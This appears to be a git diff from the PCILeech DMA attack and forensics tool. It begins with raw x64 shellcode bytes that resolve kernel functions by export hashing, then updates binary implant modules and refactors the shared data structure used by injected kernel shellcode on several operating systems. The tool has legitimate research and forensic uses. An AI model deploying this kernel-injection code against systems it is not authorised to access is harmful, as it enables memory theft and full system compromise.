+ 0x00, 0x00, 0xc7, 0x45, 0xf7, 0x92, 0x6d, 0x58, 0x58, 0xc7, 0x45, 0xfb,
+ 0xce, 0xad, 0x90, 0x4d, 0xc7, 0x45, 0xff, 0x57, 0x63, 0x32, 0x5a, 0xc7,
+ 0x45, 0x03, 0x8f, 0xb5, 0x6a, 0x6a, 0xc7, 0x45, 0x07, 0xf9, 0xbe, 0xdd,
+ 0x05, 0xc7, 0x45, 0x0b, 0xf7, 0x38, 0xb3, 0x9d, 0xc7, 0x45, 0x0f, 0xc9,
+ 0xc5, 0x6e, 0x6c, 0xc7, 0x45, 0x13, 0x89, 0x83, 0x6c, 0xeb, 0xc7, 0x45,
+ 0x17, 0x9b, 0x97, 0x64, 0xcf, 0xc7, 0x45, 0x1b, 0x2a, 0xc0, 0xb2, 0xa8,
+ 0xc7, 0x45, 0x1f, 0x3d, 0x28, 0xc3, 0x7c, 0xc7, 0x45, 0x23, 0x2a, 0xd0,
+ 0x35, 0x30, 0xc7, 0x45, 0x27, 0xdb, 0x4f, 0x3d, 0xc5, 0xc7, 0x45, 0x2b,
+ 0x61, 0x4c, 0x04, 0x5d, 0xc7, 0x45, 0x2f, 0x9d, 0x8f, 0xa0, 0xc3, 0xc7,
+ 0x45, 0x33, 0xb8, 0xd4, 0x29, 0x88, 0xc7, 0x45, 0x37, 0x50, 0x64, 0xb0,
+ 0x6f, 0xc7, 0x45, 0x3b, 0xe2, 0xca, 0x61, 0xe6, 0xc7, 0x45, 0x3f, 0xde,
+ 0x24, 0xe6, 0xf7, 0xc7, 0x45, 0x43, 0x16, 0x35, 0xfd, 0x87, 0xc7, 0x45,
+ 0x47, 0x36, 0x31, 0x0e, 0x68, 0x48, 0x8d, 0x76, 0xfc, 0x49, 0x8b, 0xce,
+ 0x8b, 0x16, 0x48, 0x8d, 0x7f, 0xf8, 0xe8, 0x25, 0x00, 0x00, 0x00, 0x48,
+ 0x89, 0x07, 0x83, 0xc3, 0xff, 0x75, 0xe6, 0x4c, 0x8d, 0x9c, 0x24, 0x90,
+ 0x00, 0x00, 0x00, 0x49, 0x8b, 0x5b, 0x10, 0x49, 0x8b, 0x73, 0x18, 0x49,
+ 0x8b, 0x7b, 0x20, 0x4d, 0x8b, 0x73, 0x28, 0x49, 0x8b, 0xe3, 0x5d, 0xc3,
+ 0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48,
+ 0x89, 0x70, 0x18, 0x48, 0x89, 0x78, 0x20, 0x8b, 0xea, 0x48, 0x85, 0xc9,
+ 0x74, 0x7a, 0xb8, 0x4d, 0x5a, 0x00, 0x00, 0x66, 0x39, 0x01, 0x75, 0x70,
+ 0x48, 0x63, 0x41, 0x3c, 0x48, 0x03, 0xc1, 0x74, 0x67, 0x81, 0x38, 0x50,
+ 0x45, 0x00, 0x00, 0x75, 0x5f, 0x8b, 0x90, 0x88, 0x00, 0x00, 0x00, 0x48,
+ 0x03, 0xd1, 0x74, 0x54, 0x44, 0x8b, 0x5a, 0x18, 0x45, 0x85, 0xdb, 0x74,
+ 0x4b, 0x8b, 0x42, 0x20, 0x85, 0xc0, 0x74, 0x44, 0x8b, 0x72, 0x24, 0x4c,
+ 0x8d, 0x0c, 0x01, 0x8b, 0x7a, 0x1c, 0x48, 0x03, 0xf1, 0x48, 0x03, 0xf9,
+ 0x45, 0x33, 0xc0, 0x45, 0x85, 0xdb, 0x74, 0x2c, 0x45, 0x8b, 0x11, 0x4c,
+ 0x03, 0xd1, 0x33, 0xdb, 0xeb, 0x0b, 0x0f, 0xb6, 0xc0, 0x49, 0xff, 0xc2,
+ 0xc1, 0xcb, 0x0d, 0x03, 0xd8, 0x41, 0x8a, 0x02, 0x84, 0xc0, 0x75, 0xee,
+ 0x3b, 0xdd, 0x74, 0x23, 0x41, 0xff, 0xc0, 0x49, 0x83, 0xc1, 0x04, 0x45,
+ 0x3b, 0xc3, 0x72, 0xd4, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x08, 0x48,
+ 0x8b, 0x6c, 0x24, 0x10, 0x48, 0x8b, 0x74, 0x24, 0x18, 0x48, 0x8b, 0x7c,
+ 0x24, 0x20, 0xc3, 0x46, 0x0f, 0xb7, 0x04, 0x46, 0x44, 0x3b, 0x42, 0x14,
+ 0x73, 0xde, 0x42, 0x8b, 0x04, 0x87, 0x48, 0x03, 0xc1, 0xeb, 0xd7, 0x00
};
const BYTE LINUX_X64_VFS_KSH[] = {
diff --git a/pcileech/tlp.c b/pcileech/tlp.c
index 8258597..f573ccd 100644
--- a/pcileech/tlp.c
+++ b/pcileech/tlp.c
@@ -107,7 +107,7 @@ VOID TLP_Print(_In_ PBYTE pbTlp, _In_ DWORD cbTlp, _In_ BOOL isTx)
);
}
printf("\n");
- Util_PrintHexAscii(pbTlp, cbTlp);
+ Util_PrintHexAscii(pbTlp, cbTlp, 0);
}
BOOL TLP_CallbackMRd(_Inout_ PTLP_CALLBACK_BUF_MRd pBufferMRd, _In_ PBYTE pb, _In_ DWORD cb, _In_opt_ HANDLE hEventCompleted)
diff --git a/pcileech/util.c b/pcileech/util.c
index bf80b9b..f110612 100644
--- a/pcileech/util.c
+++ b/pcileech/util.c
@@ -664,14 +664,15 @@ VOID Util_WaitForPowerCycle(_Inout_ PPCILEECH_CONTEXT ctx)
Util_WaitForPowerOn(ctx);
}
-VOID Util_PrintHexAscii(_In_ PBYTE pb, _In_ DWORD cb)
+VOID Util_PrintHexAscii(_In_ PBYTE pb, _In_ DWORD cb, _In_ DWORD cbInitialOffset)
{
DWORD i, j;
- if(cb > 8192) {
- printf("Large output. Only displaying first 8192 bytes.\n");
- cb = 8192;
+ if(cb > 0x10000) {
+ printf("Large output. Only displaying first 65kB.\n");
+ cb = 0x10000 - cbInitialOffset;
}
- for(i = 0; i < cb + ((cb % 16) ? (16 - cb % 16) : 0); i++)
+ cb += cbInitialOffset;
+ for(i = cbInitialOffset; i < cb + ((cb % 16) ? (16 - cb % 16) : 0); i++)
{
// address
if(0 == i % 16) {
diff --git a/pcileech/util.h b/pcileech/util.h
index 4187ac2..24acc29 100644
--- a/pcileech/util.h
+++ b/pcileech/util.h
@@ -221,7 +221,8 @@ VOID Util_WaitForPowerOn(_Inout_ PPCILEECH_CONTEXT ctx);
* Print a maximum of 8192 bytes of binary data as hexascii on the screen.
* -- pb
* -- cb
+* -- cbInitialOffset = offset, must be max 0x1000 and multiple of 0x10.
*/
-VOID Util_PrintHexAscii(_In_ PBYTE pb, _In_ DWORD cb);
+VOID Util_PrintHexAscii(_In_ PBYTE pb, _In_ DWORD cb, _In_ DWORD cbInitialOffset);
#endif /* __UTIL_H__ */
diff --git a/pcileech_files/pcileech b/pcileech_files/pcileech
index f616eef..a97a219 100644
Binary files a/pcileech_files/pcileech and b/pcileech_files/pcileech differ
diff --git a/pcileech_files/pcileech.exe b/pcileech_files/pcileech.exe
index 55d67b3..ed332ad 100644
Binary files a/pcileech_files/pcileech.exe and b/pcileech_files/pcileech.exe differ
diff --git a/pcileech_files/uefi_textout.ksh b/pcileech_files/uefi_textout.ksh
index 3e628b2..63002a7 100644
Binary files a/pcileech_files/uefi_textout.ksh and b/pcileech_files/uefi_textout.ksh differ
diff --git a/pcileech_files/uefi_winload_ntos_patch.ksh b/pcileech_files/uefi_winload_ntos_patch.ksh
new file mode 100644
index 0000000..15c49f0
Binary files /dev/null and b/pcileech_files/uefi_winload_ntos_patch.ksh differ
diff --git a/pcileech_files/wx64_filepull.ksh b/pcileech_files/wx64_filepull.ksh
index 9f8013d..ab192b9 100644
Binary files a/pcileech_files/wx64_filepull.ksh and b/pcileech_files/wx64_filepull.ksh differ
diff --git a/pcileech_files/wx64_filepush.ksh b/pcileech_files/wx64_filepush.ksh
index f489f66..83a1fdc 100644
Binary files a/pcileech_files/wx64_filepush.ksh and b/pcileech_files/wx64_filepush.ksh differ
diff --git a/pcileech_files/wx64_pagesignature.ksh b/pcileech_files/wx64_pagesignature.ksh
index 102222d..3c6685b 100644
Binary files a/pcileech_files/wx64_pagesignature.ksh and b/pcileech_files/wx64_pagesignature.ksh differ
diff --git a/pcileech_files/wx64_pscmd.ksh b/pcileech_files/wx64_pscmd.ksh
index e53a3e1..95a3527 100644
Binary files a/pcileech_files/wx64_pscmd.ksh and b/pcileech_files/wx64_pscmd.ksh differ
diff --git a/pcileech_files/wx64_pscmd_user.ksh b/pcileech_files/wx64_pscmd_user.ksh
index 22000c9..fe610ac 100644
Binary files a/pcileech_files/wx64_pscmd_user.ksh and b/pcileech_files/wx64_pscmd_user.ksh differ
diff --git a/pcileech_files/wx64_pscreate.ksh b/pcileech_files/wx64_pscreate.ksh
index 70f13ed..8392b79 100644
Binary files a/pcileech_files/wx64_pscreate.ksh and b/pcileech_files/wx64_pscreate.ksh differ
diff --git a/pcileech_shellcode/fbsdx64_common.h b/pcileech_shellcode/fbsdx64_common.h
index a4dfb9e..3303f49 100644
--- a/pcileech_shellcode/fbsdx64_common.h
+++ b/pcileech_shellcode/fbsdx64_common.h
@@ -27,7 +27,7 @@ typedef unsigned long STATUS;
* KMD DATA struct. This struct must be contained in a 4096 byte section (page).
* This page/struct is used to communicate between the inserted kernel code and
* the pcileech program.
-* VNR: 002
+* VNR: 003
*/
typedef struct tdKMDDATA {
QWORD MAGIC; // [0x000] magic number 0x0ff11337711333377.
@@ -38,11 +38,11 @@ typedef struct tdKMDDATA {
QWORD DMAAddrVirtual; // [0x028] virtual address of DMA buffer.
QWORD _status; // [0x030] status of operation
QWORD _result; // [0x038] result of operation TRUE|FALSE
- QWORD _address; // [0x040] virtual address to operate on.
+ QWORD _address; // [0x040] address to operate on.
QWORD _size; // [0x048] size of operation / data in DMA buffer.
QWORD OperatingSystem; // [0x050] operating system type
- QWORD ReservedKMD; // [0x058] reserved for specific kmd data (dependant on KMD version).
- QWORD ReservedFutureUse1[20]; // [0x060] reserved for future use.
+ QWORD ReservedKMD[8]; // [0x058] reserved for specific kmd data (dependant on KMD version).
+ QWORD ReservedFutureUse1[13]; // [0x098] reserved for future use.
QWORD dataInExtraLength; // [0x100] length of extra in-data.
QWORD dataInExtraOffset; // [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
QWORD dataInExtraLengthMax; // [0x110] maximum length of extra in-data.
diff --git a/pcileech_shellcode/fbsdx64_stage3_c.c b/pcileech_shellcode/fbsdx64_stage3_c.c
index ac7ac26..de8378c 100644
--- a/pcileech_shellcode/fbsdx64_stage3_c.c
+++ b/pcileech_shellcode/fbsdx64_stage3_c.c
@@ -1,7 +1,7 @@
// fbsdx64_stage3_c.c : stage3 main shellcode.
// Compatible with FreeBSD x64.
//
-// (c) Ulf Frisk, 2016
+// (c) Ulf Frisk, 2016, 2017
// Author: Ulf Frisk, pcileech@frizk.net
//
@@ -55,30 +55,30 @@ typedef struct tdFNBSD { // function pointers to BSD functions and structs
* KMD DATA struct. This struct must be contained in a 4096 byte section (page).
* This page/struct is used to communicate between the inserted kernel code and
* the pcileech program.
-* VNR: 002
+* VNR: 003
*/
typedef struct tdKMDDATA {
QWORD MAGIC; // [0x000] magic number 0x0ff11337711333377.
- QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of KERNEL HEADER (WINDOWS/OSX).
+ QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
QWORD AddrKallsymsLookupName; // [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
QWORD DMASizeBuffer; // [0x018] size of DMA buffer.
QWORD DMAAddrPhysical; // [0x020] physical address of DMA buffer.
QWORD DMAAddrVirtual; // [0x028] virtual address of DMA buffer.
QWORD _status; // [0x030] status of operation
QWORD _result; // [0x038] result of operation TRUE|FALSE
- QWORD _address; // [0x040] virtual address to operate on.
+ QWORD _address; // [0x040] address to operate on.
QWORD _size; // [0x048] size of operation / data in DMA buffer.
QWORD OperatingSystem; // [0x050] operating system type
- QWORD ReservedKMD; // [0x058] reserved for specific kmd data (dependant on KMD version).
- QWORD ReservedFutureUse1[20]; // [0x060] reserved for future use.
+ QWORD ReservedKMD[8]; // [0x058] reserved for specific kmd data (dependant on KMD version).
+ QWORD ReservedFutureUse1[13]; // [0x098] reserved for future use.
QWORD dataInExtraLength; // [0x100] length of extra in-data.
QWORD dataInExtraOffset; // [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
QWORD dataInExtraLengthMax; // [0x110] maximum length of extra in-data.
QWORD dataInConsoleBuffer; // [0x118] physical address of 1-page console buffer.
QWORD dataIn[28]; // [0x120]
- QWORD dataOutExtraLength; // [0x200] length of extra in-data.
+ QWORD dataOutExtraLength; // [0x200] length of extra out-data.
QWORD dataOutExtraOffset; // [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
- QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra in-data.
+ QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra out-data.
QWORD dataOutConsoleBuffer; // [0x218] physical address of 1-page console buffer.
QWORD dataOut[28]; // [0x220]
FNBSD fn; // [0x300] used by shellcode to store function pointers.
@@ -217,4 +217,4 @@ VOID stage3_c_EntryPoint(PKMDDATA pk)
pk->_op = KMD_CMD_COMPLETED;
idleCount = 0;
}
-}
\ No newline at end of file
+}
diff --git a/pcileech_shellcode/lx64_common.h b/pcileech_shellcode/lx64_common.h
index 072ed62..ee71a39 100644
--- a/pcileech_shellcode/lx64_common.h
+++ b/pcileech_shellcode/lx64_common.h
@@ -35,33 +35,33 @@ extern QWORD m_page_to_phys(QWORD p1);
extern VOID CacheFlush();
/*
-* KMD DATA struct. This struct must be contained in a 4096 byte section (page)
-* at the most. This data struct is used to communicate between the inserted
-* kernel code and the DMA reader/writer.
-* VNR: 002
+* KMD DATA struct. This struct must be contained in a 4096 byte section (page).
+* This page/struct is used to communicate between the inserted kernel code and
+* the pcileech program.
+* VNR: 003
*/
typedef struct tdKMDDATA {
QWORD MAGIC; // [0x000] magic number 0x0ff11337711333377.
- QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of KERNEL HEADER (WINDOWS/OSX).
+ QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
QWORD AddrKallsymsLookupName; // [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
QWORD DMASizeBuffer; // [0x018] size of DMA buffer.
QWORD DMAAddrPhysical; // [0x020] physical address of DMA buffer.
QWORD DMAAddrVirtual; // [0x028] virtual address of DMA buffer.
- QWORD _status; // [0x030]
- QWORD _result; // [0x038]
- QWORD _address; // [0x040] virtual address to operate on.
+ QWORD _status; // [0x030] status of operation
+ QWORD _result; // [0x038] result of operation TRUE|FALSE
+ QWORD _address; // [0x040] address to operate on.
QWORD _size; // [0x048] size of operation / data in DMA buffer.
QWORD OperatingSystem; // [0x050] operating system type
- QWORD ReservedKMD; // [0x058] reserved for specific kmd data (dependant on KMD version).
- QWORD ReservedFutureUse1[20]; // [0x060] reserved for future use.
+ QWORD ReservedKMD[8]; // [0x058] reserved for specific kmd data (dependant on KMD version).
+ QWORD ReservedFutureUse1[13]; // [0x098] reserved for future use.
QWORD dataInExtraLength; // [0x100] length of extra in-data.
QWORD dataInExtraOffset; // [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
QWORD dataInExtraLengthMax; // [0x110] maximum length of extra in-data.
QWORD dataInConsoleBuffer; // [0x118] physical address of 1-page console buffer.
QWORD dataIn[28]; // [0x120]
- QWORD dataOutExtraLength; // [0x200] length of extra in-data.
+ QWORD dataOutExtraLength; // [0x200] length of extra out-data.
QWORD dataOutExtraOffset; // [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
- QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra in-data.
+ QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra out-data.
QWORD dataOutConsoleBuffer; // [0x218] physical address of 1-page console buffer.
QWORD dataOut[28]; // [0x220]
PVOID fn[32]; // [0x300] used by shellcode to store function pointers.
diff --git a/pcileech_shellcode/lx64_stage3_c.c b/pcileech_shellcode/lx64_stage3_c.c
index 3d71c3d..495f0e0 100644
--- a/pcileech_shellcode/lx64_stage3_c.c
+++ b/pcileech_shellcode/lx64_stage3_c.c
@@ -55,30 +55,30 @@ typedef struct tdFNLX { // VOID definitions for LINUX functions (used in main co
* KMD DATA struct. This struct must be contained in a 4096 byte section (page).
* This page/struct is used to communicate between the inserted kernel code and
* the pcileech program.
-* VNR: 002
+* VNR: 003
*/
typedef struct tdKMDDATA {
QWORD MAGIC; // [0x000] magic number 0x0ff11337711333377.
- QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/OSX).
+ QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
QWORD AddrKallsymsLookupName; // [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
QWORD DMASizeBuffer; // [0x018] size of DMA buffer.
QWORD DMAAddrPhysical; // [0x020] physical address of DMA buffer.
QWORD DMAAddrVirtual; // [0x028] virtual address of DMA buffer.
QWORD _status; // [0x030] status of operation
QWORD _result; // [0x038] result of operation TRUE|FALSE
- QWORD _address; // [0x040] virtual address to operate on.
+ QWORD _address; // [0x040] address to operate on.
QWORD _size; // [0x048] size of operation / data in DMA buffer.
QWORD OperatingSystem; // [0x050] operating system type
- QWORD ReservedKMD; // [0x058] reserved for specific kmd data (dependant on KMD version).
- QWORD ReservedFutureUse1[20]; // [0x060] reserved for future use.
+ QWORD ReservedKMD[8]; // [0x058] reserved for specific kmd data (dependant on KMD version).
+ QWORD ReservedFutureUse1[13]; // [0x098] reserved for future use.
QWORD dataInExtraLength; // [0x100] length of extra in-data.
QWORD dataInExtraOffset; // [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
QWORD dataInExtraLengthMax; // [0x110] maximum length of extra in-data.
QWORD dataInConsoleBuffer; // [0x118] physical address of 1-page console buffer.
QWORD dataIn[28]; // [0x120]
- QWORD dataOutExtraLength; // [0x200] length of extra in-data.
+ QWORD dataOutExtraLength; // [0x200] length of extra out-data.
QWORD dataOutExtraOffset; // [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
- QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra in-data.
+ QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra out-data.
QWORD dataOutConsoleBuffer; // [0x218] physical address of 1-page console buffer.
QWORD dataOut[28]; // [0x220]
FNLX fn; // [0x300] used by shellcode to store function pointers.
diff --git a/pcileech_shellcode/macos_common.c b/pcileech_shellcode/macos_common.c
index cd84620..e8b9fa0 100644
--- a/pcileech_shellcode/macos_common.c
+++ b/pcileech_shellcode/macos_common.c
@@ -89,7 +89,7 @@ BOOL GetMemoryMap(PKMDDATA pk, PBYTE pbBuffer4k_PhysicalMemoryRange, PQWORD pcbB
QWORD MapMemoryPhysical(PKMDDATA pk, QWORD qwMemoryBase)
{
for(DWORD i = 0; i < 512 * 8; i++) { // PT*8 -> Pages (16MB)
- ((PQWORD)(pk->ReservedKMD + 0x2000))[i] = 0x0000000000000003 | (qwMemoryBase + 0x1000 * i);
+ ((PQWORD)(pk->ReservedKMD[0] + 0x2000))[i] = 0x0000000000000003 | (qwMemoryBase + 0x1000 * i);
}
PageFlush();
return 0xffffee8000000000;
diff --git a/pcileech_shellcode/macos_common.h b/pcileech_shellcode/macos_common.h
index 649a131..83955e9 100644
--- a/pcileech_shellcode/macos_common.h
+++ b/pcileech_shellcode/macos_common.h
@@ -63,30 +63,30 @@ typedef struct tdFNMACOS { // function pointers to macOS functions (used in main
* KMD DATA struct. This struct must be contained in a 4096 byte section (page).
* This page/struct is used to communicate between the inserted kernel code and
* the pcileech program.
-* VNR: 002
+* VNR: 003
*/
typedef struct tdKMDDATA {
QWORD MAGIC; // [0x000] magic number 0x0ff11337711333377.
- QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of KERNEL HEADER (WINDOWS/MACOS).
+ QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
QWORD AddrKallsymsLookupName; // [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
QWORD DMASizeBuffer; // [0x018] size of DMA buffer.
QWORD DMAAddrPhysical; // [0x020] physical address of DMA buffer.
QWORD DMAAddrVirtual; // [0x028] virtual address of DMA buffer.
QWORD _status; // [0x030] status of operation
QWORD _result; // [0x038] result of operation TRUE|FALSE
- QWORD _address; // [0x040] virtual address to operate on.
+ QWORD _address; // [0x040] address to operate on.
QWORD _size; // [0x048] size of operation / data in DMA buffer.
QWORD OperatingSystem; // [0x050] operating system type
- QWORD ReservedKMD; // [0x058] reserved for specific kmd data (dependant on KMD version).
- QWORD ReservedFutureUse1[20]; // [0x060] reserved for future use.
+ QWORD ReservedKMD[8]; // [0x058] reserved for specific kmd data (dependant on KMD version).
+ QWORD ReservedFutureUse1[13]; // [0x098] reserved for future use.
QWORD dataInExtraLength; // [0x100] length of extra in-data.
QWORD dataInExtraOffset; // [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
QWORD dataInExtraLengthMax; // [0x110] maximum length of extra in-data.
QWORD dataInConsoleBuffer; // [0x118] physical address of 1-page console buffer.
QWORD dataIn[28]; // [0x120]
- QWORD dataOutExtraLength; // [0x200] length of extra in-data.
+ QWORD dataOutExtraLength; // [0x200] length of extra out-data.
QWORD dataOutExtraOffset; // [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
- QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra in-data.
+ QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra out-data.
QWORD dataOutConsoleBuffer; // [0x218] physical address of 1-page console buffer.
QWORD dataOut[28]; // [0x220]
FNMACOS fn; // [0x300] used by shellcode to store function pointers.
diff --git a/pcileech_shellcode/macos_stage3_c.c b/pcileech_shellcode/macos_stage3_c.c
index 7896b3b..f6ab241 100644
--- a/pcileech_shellcode/macos_stage3_c.c
+++ b/pcileech_shellcode/macos_stage3_c.c
@@ -85,7 +85,7 @@ typedef struct tdPHYSICAL_MEMORY_RANGE {
QWORD NumberOfBytes;
} PHYSICAL_MEMORY_RANGE, *PPHYSICAL_MEMORY_RANGE;
-typedef struct tdFNOSX { // function pointers to OSX functions (used in main control program)
+typedef struct tdFNMACOS { // function pointers to macOS functions (used in main control program)
QWORD _kernel_map;
QWORD _PE_state;
QWORD IOFree;
@@ -98,7 +98,7 @@ typedef struct tdFNOSX { // function pointers to OSX functions (used in main con
QWORD memset;
QWORD vm_protect;
QWORD ReservedFutureUse[21];
-} FNOSX, *PFNOSX;
+} FNMACOS, *PFNMACOS;
#define KMDDATA_OPERATING_SYSTEM_MACOS 0x04
@@ -106,33 +106,33 @@ typedef struct tdFNOSX { // function pointers to OSX functions (used in main con
* KMD DATA struct. This struct must be contained in a 4096 byte section (page).
* This page/struct is used to communicate between the inserted kernel code and
* the pcileech program.
-* VNR: 002
+* VNR: 003
*/
typedef struct tdKMDDATA {
QWORD MAGIC; // [0x000] magic number 0x0ff11337711333377.
- QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of KERNEL HEADER (WINDOWS/MACOS).
+ QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
QWORD AddrKallsymsLookupName; // [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
QWORD DMASizeBuffer; // [0x018] size of DMA buffer.
QWORD DMAAddrPhysical; // [0x020] physical address of DMA buffer.
QWORD DMAAddrVirtual; // [0x028] virtual address of DMA buffer.
QWORD _status; // [0x030] status of operation
QWORD _result; // [0x038] result of operation TRUE|FALSE
- QWORD _address; // [0x040] virtual address to operate on.
+ QWORD _address; // [0x040] address to operate on.
QWORD _size; // [0x048] size of operation / data in DMA buffer.
QWORD OperatingSystem; // [0x050] operating system type
- QWORD ReservedKMD; // [0x058] reserved for specific kmd data (dependant on KMD version).
- QWORD ReservedFutureUse1[20]; // [0x060] reserved for future use.
+ QWORD ReservedKMD[8]; // [0x058] reserved for specific kmd data (dependant on KMD version).
+ QWORD ReservedFutureUse1[13]; // [0x098] reserved for future use.
QWORD dataInExtraLength; // [0x100] length of extra in-data.
QWORD dataInExtraOffset; // [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
QWORD dataInExtraLengthMax; // [0x110] maximum length of extra in-data.
QWORD dataInConsoleBuffer; // [0x118] physical address of 1-page console buffer.
QWORD dataIn[28]; // [0x120]
- QWORD dataOutExtraLength; // [0x200] length of extra in-data.
+ QWORD dataOutExtraLength; // [0x200] length of extra out-data.
QWORD dataOutExtraOffset; // [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
- QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra in-data.
+ QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra out-data.
QWORD dataOutConsoleBuffer; // [0x218] physical address of 1-page console buffer.
QWORD dataOut[28]; // [0x220]
- FNOSX fn; // [0x300] used by shellcode to store function pointers.
+ FNMACOS fn; // [0x300] used by shellcode to store function pointers.
CHAR dataInStr[MAX_PATH]; // [0x400] string in-data
CHAR ReservedFutureUse2[252];
CHAR dataOutStr[MAX_PATH]; // [0x600] string out-data
@@ -239,7 +239,7 @@ VOID stage3_c_EntryPoint(PKMDDATA pk)
}
*(PQWORD)(qwPT_VA + 0x0000) = 0x0000000000000023 | (qwPT_PA + 0x1000); // PDPT -> PD
*(PQWORD)(VM_MIN_KERNEL_ADDRESS + (qwCR3 & 0x00000000fffff000) + 0xEE8) = 0x0000000000000023 | qwPT_PA; // PML4 -> PDPT
- pk->ReservedKMD = qwPT_VA;
+ pk->ReservedKMD[0] = qwPT_VA;
// 3: main command loop.
while(TRUE) {
pk->_status = 1;
diff --git a/pcileech_shellcode/pcileech_shellcode.vcxproj b/pcileech_shellcode/pcileech_shellcode.vcxproj
index 6540119..c28983c 100644
--- a/pcileech_shellcode/pcileech_shellcode.vcxproj
+++ b/pcileech_shellcode/pcileech_shellcode.vcxproj
@@ -66,6 +66,8 @@
+
+
@@ -95,6 +97,7 @@
+
diff --git a/pcileech_shellcode/pcileech_shellcode.vcxproj.filters b/pcileech_shellcode/pcileech_shellcode.vcxproj.filters
index f7dc13c..ea36919 100644
--- a/pcileech_shellcode/pcileech_shellcode.vcxproj.filters
+++ b/pcileech_shellcode/pcileech_shellcode.vcxproj.filters
@@ -135,6 +135,12 @@
Source Files\test
+
+ Source Files\exec
+
+
+ Source Files\exec
+
@@ -203,6 +209,9 @@
Source Files\kmd_core
+
+ Source Files\exec
+
diff --git a/pcileech_shellcode/uefi_common.h b/pcileech_shellcode/uefi_common.h
index b2950b7..19fc6d2 100644
--- a/pcileech_shellcode/uefi_common.h
+++ b/pcileech_shellcode/uefi_common.h
@@ -14,11 +14,12 @@
typedef void VOID, *PVOID;
typedef int BOOL, *PBOOL;
typedef unsigned char BYTE, *PBYTE;
-typedef char CHAR, *PCHAR;
+typedef char CHAR, *PCHAR, *LPSTR;
typedef unsigned short WCHAR, *PWCHAR;
typedef unsigned short WORD, *PWORD;
-typedef unsigned long DWORD, *PDWORD;
-typedef unsigned __int64 QWORD, *PQWORD;
+typedef unsigned long DWORD, *PDWORD, LONG;
+typedef __int64 LONGLONG;
+typedef unsigned __int64 QWORD, *PQWORD, ULONGLONG;
typedef void *HANDLE;
typedef unsigned long STATUS;
#define NULL ((void *)0)
@@ -27,35 +28,37 @@ typedef unsigned long STATUS;
#define FALSE 0
#define UNREFERENCED_PARAMETER(P) (P)
#define LOOKUP_FUNCTION(pk, szFn) (SysVCall(pk->AddrKallsymsLookupName, szFn))
+#define min(a, b) ((a < b) ? a : b)
+#define max(a, b) ((a > b) ? a : b)
/*
-* KMD DATA struct. This struct must be contained in a 4096 byte section (page)
-* at the most. This data struct is used to communicate between the inserted
-* kernel code and the DMA reader/writer.
-* VNR: 002
+* KMD DATA struct. This struct must be contained in a 4096 byte section (page).
+* This page/struct is used to communicate between the inserted kernel code and
+* the pcileech program.
+* VNR: 003
*/
typedef struct tdKMDDATA {
QWORD MAGIC; // [0x000] magic number 0x0ff11337711333377.
- QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of KERNEL HEADER (WINDOWS/OSX).
+ QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
QWORD AddrKallsymsLookupName; // [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
QWORD DMASizeBuffer; // [0x018] size of DMA buffer.
QWORD DMAAddrPhysical; // [0x020] physical address of DMA buffer.
QWORD DMAAddrVirtual; // [0x028] virtual address of DMA buffer.
- QWORD _status; // [0x030]
- QWORD _result; // [0x038]
- QWORD _address; // [0x040] virtual address to operate on.
+ QWORD _status; // [0x030] status of operation
+ QWORD _result; // [0x038] result of operation TRUE|FALSE
+ QWORD _address; // [0x040] address to operate on.
QWORD _size; // [0x048] size of operation / data in DMA buffer.
QWORD OperatingSystem; // [0x050] operating system type
- QWORD ReservedKMD; // [0x058] reserved for specific kmd data (dependant on KMD version).
- QWORD ReservedFutureUse1[20]; // [0x060] reserved for future use.
+ QWORD ReservedKMD[8]; // [0x058] reserved for specific kmd data (dependant on KMD version).
+ QWORD ReservedFutureUse1[13]; // [0x098] reserved for future use.
QWORD dataInExtraLength; // [0x100] length of extra in-data.
QWORD dataInExtraOffset; // [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
QWORD dataInExtraLengthMax; // [0x110] maximum length of extra in-data.
QWORD dataInConsoleBuffer; // [0x118] physical address of 1-page console buffer.
